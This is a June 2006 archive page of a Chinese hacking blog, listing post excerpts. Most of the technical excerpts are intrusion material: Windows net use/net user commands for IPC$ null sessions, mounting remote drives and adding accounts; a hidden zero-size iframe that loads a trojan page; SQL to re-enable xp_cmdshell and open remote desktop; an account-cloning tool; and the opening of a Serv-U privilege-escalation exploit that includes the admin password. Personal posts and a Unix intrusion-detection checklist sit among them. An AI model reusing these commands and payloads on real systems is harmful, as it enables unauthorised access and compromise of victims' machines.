首页 | 注册 | 登录 | 归档 | 搜索 | 标签 | 在线工具
浏览模式: 标准 | 列表 2006年06月的文章

eWebEditor:网站中的隐形炸弹

Posted by amxku on 2006-06-29, 22:40 . 技术相关

站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!

漏洞利用

» 阅读全文

3 Comments | 2795 Views

一些朋友们

Posted by amxku on 2006-06-23, 01:48 . 生活琐碎

见到一些朋友们哈
农民,农妇,自在轮回,心灵港湾,孤独坏坏
哈哈,都是一群坏蛋呢
Y的,一个比一个坏,就没发现一个好的
坏坏还是老样子,真是个神哈,今天他有了新的名字,哈哈,叫作“墨迹神”,哈哈哈哈
Y的太……
脚痛得厉害,不写了
……

6 Comments | 2988 Views

DOS入侵命令全集

Posted by amxku on 2006-06-23, 01:46 . 技术相关

net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: \\ip\c$ 登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性

» 阅读全文

0 Comments | 2748 Views

All In One(AIO) V1.0

Posted by amxku on 2006-06-23, 01:38 . 杂七杂八

这是一个将很多小工具功能集成一体的一个"工具".

(如果你使用的是Build 04/01/2006版本,那版本中的syn扫描因编译时原因有些问题,请更新为Build 06/10/2006版本)

功能:
1.AutoRun             -> 查看一般登陆后启动的项
用法:Aio.exe -AutoRun

2.Clone               -> 克隆帐户
用法: Aio.exe -Clone 正常帐号 要被克隆帐户 密码
例子: Aio.exe -Clone Administrator Guest test
帮助: Aio.exe -Clone
不需要在system权限下也可用

» 阅读全文

0 Comments | 2993 Views

正确的4种挂马方式(属于比较简单的)

Posted by amxku on 2006-06-23, 01:35 . 杂七杂八

一、最简单的也是最有效的

<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

二、js挂马

» 阅读全文

2 Comments | 3367 Views

完全终结sa

Posted by amxku on 2006-06-21, 00:28 . 技术相关

SQL恢复XP_CMDSHLL 以及XPLOG70.DLL被删 直接用SQL连接器开启3389
用SQL连接器恢复XP_CMDSHLLE的命令
(1)SQL Query Analyzer
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
去除
sp_dropextendedproc 'xp_cmdshell'
(3)MSSQL2000

» 阅读全文

0 Comments | 3362 Views

网页经典代码

Posted by amxku on 2006-06-20, 16:02 . 技术相关

1. 将彻底屏蔽鼠标右键,无右键菜单
<body oncontextmenu="window.event.returnvalue=false">
也可以用于网页中Table框架中
<table border oncontextmenu=return(false)><td>no</table>
2.取消选取、防止复制
<body onselectstart="return false">
3.不准粘贴
<body onpaste="return false">
4.防止复制

» 阅读全文

0 Comments | 2596 Views

Serv-U All Version本地提升权限Exp10it Ver 1.5

Posted by amxku on 2006-06-19, 10:51 . 杂七杂八

$addr = '0.0.0.0';
$ftpport = 21;
$adminport = 43958;
$adminuser = 'LocalAdministrator';
$adminpass = '#l@$ak#.lk;0@P';
$user = '110';
$password = '110';
$homedir = 'C:\\';
$dir = 'C:\\WINNT\\System32\\';

//有改变则赋值

» 阅读全文

0 Comments | 2915 Views

离开

Posted by amxku on 2006-06-15, 09:00 . 生活琐碎

离开

» 阅读全文

7 Comments | 3153 Views

检测Unix是否被入侵最快捷的方法

Posted by amxku on 2006-06-14, 23:48 . 技术相关

鉴别Unix系统是否被入侵,需要较高的技巧,当然也有一些非常简单的方法。

  简单的方法就是检查系统日志、进程表和文件系统,查看是否存在一些“奇怪的”消息、进程或者文件。例如:

  两个运行的inetd进程(应该只有一个);

  .ssh以root的EUID运行而不是以root的UID运行;

  在“/”下的RPC服务的核心文件;

  新的setuid/setgid程序;

  大小迅速增长的文件;

» 阅读全文

0 Comments | 2140 Views

Records:28123Next›